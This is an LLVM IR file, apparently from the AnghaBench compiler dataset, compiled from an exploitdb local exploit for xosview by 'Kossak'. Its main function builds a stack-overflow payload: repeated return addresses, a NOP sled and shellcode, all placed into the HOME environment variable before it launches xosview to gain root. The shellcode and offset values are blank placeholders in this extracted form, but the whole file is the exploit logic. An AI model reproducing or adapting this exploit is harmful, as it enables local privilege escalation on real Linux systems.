; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19281.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19281.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@DEFAULT_OFFSET = common dso_local global i32 0, align 4
@DEFAULT_BUFFER_SIZE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [24 x i8] c"Can't allocate memory.\0A\00", align 1
@.str.1 = private unnamed_addr constant [27 x i8] c"xosview exploit by Kossak\0A\00", align 1
@.str.2 = private unnamed_addr constant [59 x i8] c"try changing the default values if you dont get root now.\0A\00", align 1
@.str.3 = private unnamed_addr constant [21 x i8] c"Using address: 0x%x\0A\00", align 1
@NOP = common dso_local global i8 0, align 1
@shellcode = common dso_local global i32* null, align 8
@.str.4 = private unnamed_addr constant [5 x i8] c"HOME\00", align 1
@.str.5 = private unnamed_addr constant [34 x i8] c"/usr/bin/X11/xosview -display 0:0\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca i8*, align 8
  %6 = alloca i8*, align 8
  %7 = alloca i64*, align 8
  %8 = alloca i64, align 8
  %9 = alloca i32, align 4
  %10 = alloca i32, align 4
  %11 = alloca i32, align 4
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %12 = load i32, i32* @DEFAULT_OFFSET, align 4
  store i32 %12, i32* %9, align 4
  %13 = load i32, i32* @DEFAULT_BUFFER_SIZE, align 4
  store i32 %13, i32* %10, align 4
  %14 = load i32, i32* %10, align 4
  %15 = call i8* @malloc(i32 %14)
  store i8* %15, i8** %5, align 8
  %16 = icmp ne i8* %15, null
  br i1 %16, label %20, label %17

17:                                               ; preds = %2
  %18 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str, i64 0, i64 0))
  %19 = call i32 @exit(i32 0) #3
  unreachable

20:                                               ; preds = %2
  %21 = call i32 (...) @get_sp()
  %22 = load i32, i32* %9, align 4
  %23 = sub nsw i32 %21, %22
  %24 = sext i32 %23 to i64
  store i64 %24, i64* %8, align 8
  %25 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.1, i64 0, i64 0))
  %26 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([59 x i8], [59 x i8]* @.str.2, i64 0, i64 0))
  %27 = load i64, i64* %8, align 8
  %28 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.3, i64 0, i64 0), i64 %27)
  %29 = load i8*, i8** %5, align 8
  store i8* %29, i8** %6, align 8
  %30 = load i8*, i8** %6, align 8
  %31 = bitcast i8* %30 to i64*
  store i64* %31, i64** %7, align 8
  store i32 0, i32* %11, align 4
  br label %32

32:                                               ; preds = %40, %20
  %33 = load i32, i32* %11, align 4
  %34 = load i32, i32* %10, align 4
  %35 = icmp slt i32 %33, %34
  br i1 %35, label %36, label %43

36:                                               ; preds = %32
  %37 = load i64, i64* %8, align 8
  %38 = load i64*, i64** %7, align 8
  %39 = getelementptr inbounds i64, i64* %38, i32 1
  store i64* %39, i64** %7, align 8
  store i64 %37, i64* %38, align 8
  br label %40

40:                                               ; preds = %36
  %41 = load i32, i32* %11, align 4
  %42 = add nsw i32 %41, 4
  store i32 %42, i32* %11, align 4
  br label %32

43:                                               ; preds = %32
  store i32 0, i32* %11, align 4
  br label %44

44:                                               ; preds = %55, %43
  %45 = load i32, i32* %11, align 4
  %46 = load i32, i32* %10, align 4
  %47 = sdiv i32 %46, 2
  %48 = icmp slt i32 %45, %47
  br i1 %48, label %49, label %58

49:                                               ; preds = %44
  %50 = load i8, i8* @NOP, align 1
  %51 = load i8*, i8** %5, align 8
  %52 = load i32, i32* %11, align 4
  %53 = sext i32 %52 to i64
  %54 = getelementptr inbounds i8, i8* %51, i64 %53
  store i8 %50, i8* %54, align 1
  br label %55

55:                                               ; preds = %49
  %56 = load i32, i32* %11, align 4
  %57 = add nsw i32 %56, 1
  store i32 %57, i32* %11, align 4
  br label %44

58:                                               ; preds = %44
  %59 = load i8*, i8** %5, align 8
  %60 = load i32, i32* %10, align 4
  %61 = sdiv i32 %60, 2
  %62 = load i32*, i32** @shellcode, align 8
  %63 = call i32 @strlen(i32* %62)
  %64 = sdiv i32 %63, 2
  %65 = sub nsw i32 %61, %64
  %66 = sext i32 %65 to i64
  %67 = getelementptr inbounds i8, i8* %59, i64 %66
  store i8* %67, i8** %6, align 8
  store i32 0, i32* %11, align 4
  br label %68

68:                                               ; preds = %82, %58
  %69 = load i32, i32* %11, align 4
  %70 = load i32*, i32** @shellcode, align 8
  %71 = call i32 @strlen(i32* %70)
  %72 = icmp slt i32 %69, %71
  br i1 %72, label %73, label %85

73:                                               ; preds = %68
  %74 = load i32*, i32** @shellcode, align 8
  %75 = load i32, i32* %11, align 4
  %76 = sext i32 %75 to i64
  %77 = getelementptr inbounds i32, i32* %74, i64 %76
  %78 = load i32, i32* %77, align 4
  %79 = trunc i32 %78 to i8
  %80 = load i8*, i8** %6, align 8
  %81 = getelementptr inbounds i8, i8* %80, i32 1
  store i8* %81, i8** %6, align 8
  store i8 %79, i8* %80, align 1
  br label %82

82:                                               ; preds = %73
  %83 = load i32, i32* %11, align 4
  %84 = add nsw i32 %83, 1
  store i32 %84, i32* %11, align 4
  br label %68

85:                                               ; preds = %68
  %86 = load i8*, i8** %5, align 8
  %87 = load i32, i32* %10, align 4
  %88 = sub nsw i32 %87, 1
  %89 = sext i32 %88 to i64
  %90 = getelementptr inbounds i8, i8* %86, i64 %89
  store i8 0, i8* %90, align 1
  %91 = load i8*, i8** %5, align 8
  %92 = call i32 @setenv(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.4, i64 0, i64 0), i8* %91, i32 1)
  %93 = call i32 @system(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.5, i64 0, i64 0))
  ret void
}

declare dso_local i8* @malloc(i32) #1

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @get_sp(...) #1

declare dso_local i32 @strlen(i32*) #1

declare dso_local i32 @setenv(i8*, i8*, i32) #1

declare dso_local i32 @system(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
